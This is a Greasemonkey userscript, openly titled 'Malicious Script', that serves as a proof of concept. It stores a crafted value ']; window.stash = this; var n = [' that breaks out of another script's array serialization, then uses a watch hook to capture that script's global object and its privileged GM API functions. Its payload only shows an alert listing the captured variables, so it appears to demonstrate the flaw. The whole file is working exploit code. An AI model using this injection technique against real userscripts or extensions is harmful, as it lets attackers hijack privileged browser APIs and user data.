// ==UserScript==
// @name           Malicious Script
// @namespace      http://test.free.fr
// @description    A malicious script that targets a careless script and gains access to its GM api functions.
// @include        *
// ==/UserScript==

function exploit(getArray) {
	if (typeof getArray == "undefined")
		getArray = window.getArray;
	saveArray('mal', ']; window.stash = this; var n = [');
	getArray('mal');
	var str = "";
	for (var i in window.stash)
		str += i + "\n";
	alert("A malicious script has obtained a reference\n" +
	"to the global object of another script. It now has\n" +
	"access to these global variables of that script:\n\n" + str);
}

if (typeof saveArray != "undefined" &&
	typeof getArray != "undefined") {
	exploit();
} else {
	window.saveArray = null;
	window.getArray = null;
	window.watch = Object.prototype.watch;
	window.watch('getArray', function(id, oldval, newval) {
		exploit(newval);
		return newval;
	});
}